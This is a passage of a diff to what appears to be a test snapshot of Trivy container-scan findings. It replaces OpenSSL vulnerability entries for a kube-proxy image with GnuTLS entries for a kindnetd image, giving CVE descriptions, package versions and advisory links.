"https://bugzilla.redhat.com/show_bug.cgi?id=1922276", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2081494", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1965445", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2097310", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1967983", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2100554", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20231", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2104905", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20232", }, { "type": "URL", - "value": "https://cert-portal.siemens.com/productcert/pdf/ssa-332410.pdf", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3580", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1292", + "value": "https://errata.almalinux.org/8/ALSA-2021-4451.html", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2068", + "value": "https://errata.rockylinux.org/RLSA-2021:4451", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2097", + "value": "https://gitlab.com/gnutls/gnutls/-/issues/1151", }, { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2022-6224.html", + "value": "https://linux.oracle.com/cve/CVE-2021-20232.html", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2022:5818", + "value": "https://linux.oracle.com/errata/ELSA-2022-9221.html", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2c9c35870601b4a44d86ddbf512b38df38285cfa", + "value": "https://lists.apache.org/thread.html/r50661d6f0082709aad9a584431b59ec364f9974b63b07e0800230168@%3Cissues.spark.apache.org%3E", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=7a9c027159fe9e1bbc2cd38a8a2914bff0d5abd9", + "value": "https://lists.apache.org/thread.html/r5d4001031e7790d8c6396c499522b4ed2aab782da87b1a14184793bb@%3Cissues.spark.apache.org%3E", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=9639817dac8bbbaa64d09efad7464ccc405527c7", + "value": "https://lists.apache.org/thread.html/r5f88bed447742fcc5c47bf1c7be965ef450131914a6e1f85feba2779@%3Cissues.spark.apache.org%3E", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-2068.html", + "value": "https://lists.apache.org/thread.html/r6ac143ba6dd98bd4bf6bf010d46e56e254056459721ba18822d611f7@%3Cissues.spark.apache.org%3E", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2022-9751.html", + "value": "https://lists.apache.org/thread.html/r9cbc69e57276413788e90a6ee16c7c034ea4258d31935b70db2bd158@%3Cissues.spark.apache.org%3E", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6WZZBKUHQFGSKGNXXKICSRPL7AMVW5M5/", + "value": "https://lists.apache.org/thread.html/rcd70a4c88a47a75fd2d5f3ffb7cee8c2a18c713320bd90fdcb57495f@%3Cissues.spark.apache.org%3E", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VCMNWKERPBKOEBNL7CLTTX3ZZCZLH7XA/", + "value": "https://lists.apache.org/thread.html/rf5e1256d870193def4a82ad89ab95e63943a313b5ff0d81aa87e4532@%3Cissues.spark.apache.org%3E", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-2068", + "value": "https://lists.apache.org/thread.html/rfd5273d72d244178441e6904a2f2b41a3268f569e8092ea0b3b2bb20@%3Cissues.spark.apache.org%3E", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20220707-0008/", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/OSLAE6PP33A7VYRYMYMUVB3U6B26GZER/", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5488-1", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-20232", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5488-2", + "value": "https://security.netapp.com/advisory/ntap-20210416-0005/", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-2068", + "value": "https://ubuntu.com/security/notices/USN-5029-1", }, { "type": "URL", - "value": "https://www.debian.org/security/2022/dsa-5169", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-20232", }, { "type": "URL", - "value": "https://www.openssl.org/news/secadv/20220621.txt", + "value": "https://www.gnutls.org/security-new.html#GNUTLS-SA-2021-03-10", }, ], "severity": "HIGH", }, { "attributes": { - "fixedVersion": "1.1.1n-0+deb11u4", - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2022-4450", - "installedVersion": "1.1.1n-0+deb11u1", - "packageName": "libssl1.1", + "fixedVersion": "3.6.7-4+deb10u7", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2020-24659", + "installedVersion": "3.6.7-4+deb10u5", + "packageName": "libgnutls30", "references": [ - "https://access.redhat.com/errata/RHSA-2023:2165", - "https://access.redhat.com/security/cve/CVE-2022-4450", - "https://bugzilla.redhat.com/1960321", - "https://bugzilla.redhat.com/2164440", - "https://bugzilla.redhat.com/2164487", - "https://bugzilla.redhat.com/2164492", - "https://bugzilla.redhat.com/2164494", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144000", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144003", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144006", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144008", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144010", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144012", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144015", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144017", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144019", - "https://bugzilla.redhat.com/show_bug.cgi?id=2145170", - "https://bugzilla.redhat.com/show_bug.cgi?id=2158412", - "https://bugzilla.redhat.com/show_bug.cgi?id=2164440", - "https://bugzilla.redhat.com/show_bug.cgi?id=2164487", - "https://bugzilla.redhat.com/show_bug.cgi?id=2164488", - "https://bugzilla.redhat.com/show_bug.cgi?id=2164492", - "https://bugzilla.redhat.com/show_bug.cgi?id=2164494", - "https://bugzilla.redhat.com/show_bug.cgi?id=2164497", - "https://bugzilla.redhat.com/show_bug.cgi?id=2164499", - "https://bugzilla.redhat.com/show_bug.cgi?id=2164500", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4203", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4304", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4450", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0215", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0216", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0217", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0286", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0401", - "https://errata.almalinux.org/9/ALSA-2023-2165.html", - "https://errata.rockylinux.org/RLSA-2023:0946", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=63bcf189be73a9cc1264059bed6f57974be74a83", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=bbcf509bd046b34cca19c766bbddc31683d0858b", - "https://github.com/advisories/GHSA-v5w6-wcm8-jm4q", - "https://linux.oracle.com/cve/CVE-2022-4450.html", - "https://linux.oracle.com/errata/ELSA-2023-2932.html", - "https://nvd.nist.gov/vuln/detail/CVE-2022-4450", - "https://rustsec.org/advisories/RUSTSEC-2023-0010.html", - "https://ubuntu.com/security/notices/USN-5844-1", - "https://www.cve.org/CVERecord?id=CVE-2022-4450", - "https://www.openssl.org/news/secadv/20230207.txt", + "http://lists.opensuse.org/opensuse-security-announce/2020-10/msg00054.html", + "http://lists.opensuse.org/opensuse-security-announce/2020-10/msg00060.html", + "https://access.redhat.com/security/cve/CVE-2020-24659", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-24659", + "https://gitlab.com/gnutls/gnutls/-/issues/1071", + "https://linux.oracle.com/cve/CVE-2020-24659.html", + "https://linux.oracle.com/errata/ELSA-2020-5483.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/62BUAI4FQQLG6VTKRT7SUZPGJJ4NASQ3/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/AWN56FDLQQXT2D2YHNI4TYH432TDMQ7N/", + "https://nvd.nist.gov/vuln/detail/CVE-2020-24659", + "https://security.gentoo.org/glsa/202009-01", + "https://security.netapp.com/advisory/ntap-20200911-0006/", + "https://ubuntu.com/security/notices/USN-4491-1", + "https://usn.ubuntu.com/4491-1/", + "https://www.cve.org/CVERecord?id=CVE-2020-24659", + "https://www.gnutls.org/security-new.html#GNUTLS-SA-2020-09-04", ], }, "category": "Vulnerability", - "description": "The function PEM_read_bio_ex() reads a PEM file from a BIO and parses and decodes the "name" (e.g. "CERTIFICATE"), any header data and the payload data. If the function succeeds then the "name_out", "header" and "data" arguments are populated with pointers to buffers containing the relevant decoded data. The caller is responsible for freeing those buffers. It is possible to construct a PEM file that results in 0 bytes of payload data. In this case PEM_read_bio_ex() will return a failure code but will populate the header argument with a pointer to a buffer that has already been freed. If the caller also frees this buffer then a double free will occur. This will most likely lead to a crash. This could be exploited by an attacker who has the ability to supply malicious PEM files for parsing to achieve a denial of service attack. The functions PEM_read_bio() and PEM_read() are simple wrappers around PEM_read_bio_ex() and therefore these functions are also directly affected. These functions are also called indirectly by a number of other OpenSSL functions including PEM_X509_INFO_read_bio_ex() and SSL_CTX_use_serverinfo_file() which are also vulnerable. Some OpenSSL internal uses of these functions are not vulnerable because the caller does not free the header argument if PEM_read_bio_ex() returns a failure code. These locations include the PEM_read_bio_TYPE() functions as well as the decoders introduced in OpenSSL 3.0. The OpenSSL asn1parse command line application is also impacted by this issue.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "description": "An issue was discovered in GnuTLS before 3.6.15. A server can trigger a NULL pointer dereference in a TLS 1.3 client if a no_renegotiation alert is sent with unexpected timing, and then an invalid second handshake occurs. The crash happens in the application's error handling path, where the gnutls_deinit function is called after detecting a handshake failure.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "double free after calling PEM_read_bio_ex", + "name": "gnutls: Heap buffer overflow in handshake with no_renegotiation alert sent", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-4450", - }, - { - "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2023:2165", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-4450", - }, - { - "type": "URL", - "value": "https://bugzilla.redhat.com/1960321", - }, - { - "type": "URL", - "value": "https://bugzilla.redhat.com/2164440", - }, - { - "type": "URL", - "value": "https://bugzilla.redhat.com/2164487", - }, - { - "type": "URL", - "value": "https://bugzilla.redhat.com/2164492", - }, - { - "type": "URL", - "value": "https://bugzilla.redhat.com/2164494", - }, - { - "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144000", + "value": "https://avd.aquasec.com/nvd/cve-2020-24659", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144003", + "value": "http://lists.opensuse.org/opensuse-security-announce/2020-10/msg00054.html", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144006", + "value": "http://lists.opensuse.org/opensuse-security-announce/2020-10/msg00060.html", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144008", + "value": "https://access.redhat.com/security/cve/CVE-2020-24659", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144010", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-24659", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144012", + "value": "https://gitlab.com/gnutls/gnutls/-/issues/1071", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144015", + "value": "https://linux.oracle.com/cve/CVE-2020-24659.html", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144017", + "value": "https://linux.oracle.com/errata/ELSA-2020-5483.html", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144019", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/62BUAI4FQQLG6VTKRT7SUZPGJJ4NASQ3/", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2145170", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/AWN56FDLQQXT2D2YHNI4TYH432TDMQ7N/", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2158412", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2020-24659", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164440", + "value": "https://security.gentoo.org/glsa/202009-01", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164487", + "value": "https://security.netapp.com/advisory/ntap-20200911-0006/", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164488", + "value": "https://ubuntu.com/security/notices/USN-4491-1", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164492", + "value": "https://usn.ubuntu.com/4491-1/", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164494", + "value": "https://www.cve.org/CVERecord?id=CVE-2020-24659", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164497", + "value": "https://www.gnutls.org/security-new.html#GNUTLS-SA-2020-09-04", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": "3.6.7-4+deb10u9", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2022-2509", + "installedVersion": "3.6.7-4+deb10u5", + "packageName": "libgnutls30", + "references": [ + "https://access.redhat.com/errata/RHSA-2022:6854", + "https://access.redhat.com/security/cve/CVE-2022-2509", + "https://bugzilla.redhat.com/2108977", + "https://bugzilla.redhat.com/show_bug.cgi?id=2076626", + "https://bugzilla.redhat.com/show_bug.cgi?id=2108635", + "https://bugzilla.redhat.com/show_bug.cgi?id=2108977", + "https://bugzilla.redhat.com/show_bug.cgi?id=2119770", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2509", + "https://errata.almalinux.org/9/ALSA-2022-6854.html", + "https://errata.rockylinux.org/RLSA-2022:6854", + "https://gnutls.org/security-new.html (GNUTLS-SA-2022-07-07)", + "https://gnutls.org/security-new.html#GNUTLS-SA-2022-07-07", + "https://linux.oracle.com/cve/CVE-2022-2509.html", + "https://linux.oracle.com/errata/ELSA-2022-7105.html", + "https://lists.debian.org/debian-lts-announce/2022/08/msg00002.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6FL27JS3VM74YEQU7PGB62USO3KSBYZX/", + "https://lists.gnupg.org/pipermail/gnutls-help/2022-July/004746.html", + "https://nvd.nist.gov/vuln/detail/CVE-2022-2509", + "https://ubuntu.com/security/notices/USN-5550-1", + "https://www.cve.org/CVERecord?id=CVE-2022-2509", + "https://www.debian.org/security/2022/dsa-5203", + ], + }, + "category": "Vulnerability", + "description": "A vulnerability found in gnutls. This security flaw happens because of a double free error occurs during verification of pkcs7 signatures in gnutls_pkcs7_verify function.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "mitigation": undefined, + "name": "Double free during gnutls_pkcs7_verify", + "references": [ { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164499", + "value": "https://avd.aquasec.com/nvd/cve-2022-2509", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164500", + "value": "https://access.redhat.com/errata/RHSA-2022:6854", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4203", + "value": "https://access.redhat.com/security/cve/CVE-2022-2509", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4304", + "value": "https://bugzilla.redhat.com/2108977", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4450", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2076626", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0215", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2108635", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0216", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2108977", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0217", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2119770", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0286", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2509", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0401", + "value": "https://errata.almalinux.org/9/ALSA-2022-6854.html", }, { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2023-2165.html", + "value": "https://errata.rockylinux.org/RLSA-2022:6854", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2023:0946", + "value": "https://gnutls.org/security-new.html (GNUTLS-SA-2022-07-07)", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=63bcf189be73a9cc1264059bed6f57974be74a83", + "value": "https://gnutls.org/security-new.html#GNUTLS-SA-2022-07-07", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=bbcf509bd046b34cca19c766bbddc31683d0858b", + "value": "https://linux.oracle.com/cve/CVE-2022-2509.html", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-v5w6-wcm8-jm4q", + "value": "https://linux.oracle.com/errata/ELSA-2022-7105.html", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-4450.html", + "value": "https://lists.debian.org/debian-lts-announce/2022/08/msg00002.html", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2023-2932.html", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6FL27JS3VM74YEQU7PGB62USO3KSBYZX/", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-4450", + "value": "https://lists.gnupg.org/pipermail/gnutls-help/2022-July/004746.html", }, { "type": "URL", - "value": "https://rustsec.org/advisories/RUSTSEC-2023-0010.html", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-2509", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5844-1", + "value": "https://ubuntu.com/security/notices/USN-5550-1", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-4450", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-2509", }, { "type": "URL", - "value": "https://www.openssl.org/news/secadv/20230207.txt", + "value": "https://www.debian.org/security/2022/dsa-5203", }, ], "severity": "HIGH", }, { "attributes": { - "fixedVersion": "1.1.1n-0+deb11u4", - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2023-0215", - "installedVersion": "1.1.1n-0+deb11u1", - "packageName": "libssl1.1", + "fixedVersion": "3.6.7-4+deb10u10", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2023-0361", + "installedVersion": "3.6.7-4+deb10u5", + "packageName": "libgnutls30", "references": [ - "https://access.redhat.com/errata/RHSA-2023:2165", - "https://access.redhat.com/security/cve/CVE-2023-0215", - "https://bugzilla.redhat.com/1960321", - "https://bugzilla.redhat.com/2164440", - "https://bugzilla.redhat.com/2164487", - "https://bugzilla.redhat.com/2164492", - "https://bugzilla.redhat.com/2164494", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144000", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144003", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144006", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144008", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144010", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144012", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144015", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144017", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144019", - "https://bugzilla.redhat.com/show_bug.cgi?id=2145170", - "https://bugzilla.redhat.com/show_bug.cgi?id=2158412", - "https://bugzilla.redhat.com/show_bug.cgi?id=2164440", - "https://bugzilla.redhat.com/show_bug.cgi?id=2164487", - "https://bugzilla.redhat.com/show_bug.cgi?id=2164488", - "https://bugzilla.redhat.com/show_bug.cgi?id=2164492", - "https://bugzilla.redhat.com/show_bug.cgi?id=2164494", - "https://bugzilla.redhat.com/show_bug.cgi?id=2164497", - "https://bugzilla.redhat.com/show_bug.cgi?id=2164499", - "https://bugzilla.redhat.com/show_bug.cgi?id=2164500", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4203", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4304", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4450", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0215", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0216", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0217", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0286", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0401", - "https://errata.almalinux.org/9/ALSA-2023-2165.html", - "https://errata.rockylinux.org/RLSA-2023:0946", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=8818064ce3c3c0f1b740a5aaba2a987e75bfbafd", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=9816136fe31d92ace4037d5da5257f763aeeb4eb", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=c3829dd8825c654652201e16f8a0a0c46ee3f344", - "https://github.com/advisories/GHSA-r7jw-wp68-3xch", - "https://linux.oracle.com/cve/CVE-2023-0215.html", - "https://linux.oracle.com/errata/ELSA-2023-2932.html", - "https://nvd.nist.gov/vuln/detail/CVE-2023-0215", - "https://rustsec.org/advisories/RUSTSEC-2023-0009.html", - "https://security.netapp.com/advisory/ntap-20230427-0007/", - "https://security.netapp.com/advisory/ntap-20230427-0009/", - "https://ubuntu.com/security/notices/USN-5844-1", - "https://ubuntu.com/security/notices/USN-5845-1", - "https://ubuntu.com/security/notices/USN-5845-2", - "https://www.cve.org/CVERecord?id=CVE-2023-0215", - "https://www.openssl.org/news/secadv/20230207.txt", + "https://access.redhat.com/errata/RHSA-2023:1141", + "https://access.redhat.com/security/cve/CVE-2023-0361", + "https://bugzilla.redhat.com/2162596", + "https://bugzilla.redhat.com/show_bug.cgi?id=2131152", + "https://bugzilla.redhat.com/show_bug.cgi?id=2162596", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0361", + "https://errata.almalinux.org/9/ALSA-2023-1141.html", + "https://errata.rockylinux.org/RLSA-2023:1569", + "https://github.com/tlsfuzzer/tlsfuzzer/pull/679", + "https://gitlab.com/gnutls/gnutls/-/issues/1050", + "https://gnutls.org/security-new.html#GNUTLS-SA-2020-07-14", + "https://linux.oracle.com/cve/CVE-2023-0361.html", + "https://linux.oracle.com/errata/ELSA-2023-1569.html", + "https://lists.debian.org/debian-lts-announce/2023/02/msg00015.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UFIA3X4IZ3CW7SRQ2UHNHNPMRIAWF2FI/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/WS4KVDOG6QTALWHC2QE4Y7VPDRMLTRWQ/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Z634YBXAJ5VLDI62IOPBVP5K6YFHAWCY/", + "https://nvd.nist.gov/vuln/detail/CVE-2023-0361", + "https://security.netapp.com/advisory/ntap-20230324-0005/", + "https://ubuntu.com/security/notices/USN-5901-1", + "https://www.cve.org/CVERecord?id=CVE-2023-0361", ], }, "category": "Vulnerability", - "description": "The public API function BIO_new_NDEF is a helper function used for streaming -ASN.1 data via a BIO. It is primarily used internally to OpenSSL to support the -SMIME, CMS and PKCS7 streaming capabilities, but may also be called directly by -end user applications. - -The function receives a BIO from the caller, prepends a new BIO_f_asn1 filter -BIO onto the front of it to form a BIO chain, and then returns the new head of -the BIO chain to the caller. Under certain conditions, for example if a CMS -recipient public key is invalid, the new filter BIO is freed and the function -returns a NULL result indicating a failure. However, in this case, the BIO chain -is not properly cleaned up and the BIO passed by the caller still retains -internal pointers to the previously freed filter BIO. If the caller then goes on -to call BIO_pop() on the BIO then a use-after-free will occur. This will most -likely result in a crash. - - - -This scenario occurs directly in the internal function B64_write_ASN1() which -may cause BIO_new_NDEF() to be called and will subsequently call BIO_pop() on -the BIO. This internal function is in turn called by the public API functions -PEM_write_bio_ASN1_stream, PEM_write_bio_CMS_stream, PEM_write_bio_PKCS7_stream, -SMIME_write_ASN1, SMIME_write_CMS and SMIME_write_PKCS7. - -Other public API functions that may be impacted by this include -i2d_ASN1_bio_stream, BIO_new_CMS, BIO_new_PKCS7, i2d_CMS_bio_stream and -i2d_PKCS7_bio_stream. - -The OpenSSL cms and smime command line applications are similarly affected. - - - -", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "description": "A timing side-channel in the handling of RSA ClientKeyExchange messages was discovered in GnuTLS. This side-channel can be sufficient to recover the key encrypted in the RSA ciphertext across a network in a Bleichenbacher style attack. To achieve a successful decryption the attacker would need to send a large amount of specially crafted messages to the vulnerable server. By recovering the secret from the ClientKeyExchange message, the attacker would be able to decrypt the application data exchanged over that connection.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "use-after-free following BIO_new_NDEF", + "name": "timing side-channel in the TLS RSA key exchange code", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2023-0215", - }, - { - "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2023:2165", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2023-0215", + "value": "https://avd.aquasec.com/nvd/cve-2023-0361", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/1960321", + "value": "https://access.redhat.com/errata/RHSA-2023:1141", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2164440", + "value": "https://access.redhat.com/security/cve/CVE-2023-0361", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2164487", + "value": "https://bugzilla.redhat.com/2162596", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2164492", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2131152", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2164494", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2162596", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144000", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0361", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144003", + "value": "https://errata.almalinux.org/9/ALSA-2023-1141.html", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144006", + "value": "https://errata.rockylinux.org/RLSA-2023:1569", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144008", + "value": "https://github.com/tlsfuzzer/tlsfuzzer/pull/679", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144010", + "value": "https://gitlab.com/gnutls/gnutls/-/issues/1050", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144012", + "value": "https://gnutls.org/security-new.html#GNUTLS-SA-2020-07-14", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144015", + "value": "https://linux.oracle.com/cve/CVE-2023-0361.html", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144017", + "value": "https://linux.oracle.com/errata/ELSA-2023-1569.html", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144019", + "value": 